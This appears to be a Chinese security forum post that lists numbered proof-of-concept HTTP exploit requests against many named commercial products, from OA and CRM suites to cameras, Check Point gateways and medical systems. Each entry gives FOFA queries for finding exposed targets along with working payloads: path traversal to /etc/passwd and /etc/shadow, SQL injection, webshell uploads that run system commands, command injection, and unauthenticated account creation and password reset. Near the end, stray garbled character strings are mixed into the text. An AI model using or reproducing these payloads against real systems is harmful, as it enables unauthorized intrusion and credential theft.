POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. Tongtianxing (通天星) CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera (DT-高清车牌识别摄像机) arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. Jinhe (金和) OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. Jinhe (金和) OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system (电信网关配置管理系统) rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. Jianwen (建文) engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. Bangguanke (帮管客) CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. Runshen (润申) enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. Runshen (润申) enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. Guangzhou Tuchuang (图创) Interlib library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. Xunrao (迅饶科技) X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. Realor (瑞友) Tianyi application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. Santi (叁体) Jiahui video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) Clinical Browsing System deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. Short Video Matrix Marketing System (短视频矩阵营销系统) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 Electronic Document Security Management System NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 Foreign Trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科 云鉴 Security Management System setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE Enterprise Operations Management Platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 Internet Behavior Management System send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 Unified Authentication Platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

2 z2 ~& u. S9 O  {4 L  h8 h8 `1 F197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
' H* _% c. q, ?. J4 SFOFA:app="浙大恩特客户资源管理系统"
6 Q, C% [1 y  p' rGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1  Q6 G' [+ T1 ]. L& {1 `- t
Host:9 W0 S+ ], E8 U. B8 D4 Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36, ~% Q" ?8 I( i
Accept-Encoding: gzip, deflate0 p3 Z: q) V7 ~' B* W  O% I& k; j
Connection: close
4 B6 ^* k; _; r: D6 t6 F
2 ^4 ]4 Q, H' i2 W  `0 I  t: Z  c9 U* N  X% ~
+ J4 g3 y# o0 o& o' H
198. 阿里云盘 (aliyundrive) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. cockpit system assetsmanager_upload interface file upload

1. Run the POC to obtain the CSRF value, then obtain the cookie, then upload and request the file to see the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/

Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 (Founder) All-Media News Editing System binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0


Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云 (Redsea) EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type: image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
" m% O: l, b' c$ f6 \
5 a3 Q0 c2 ~: Y7 C( E9 g) [
8 p! e- L' `' ~( O2 G, H" [4 b! B7 Y  W7 k9 n+ O3 L/ [- A; w

% \8 y) [. ^  C: ^# L( n$ _6 {; Q4 H5 D( a2 q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表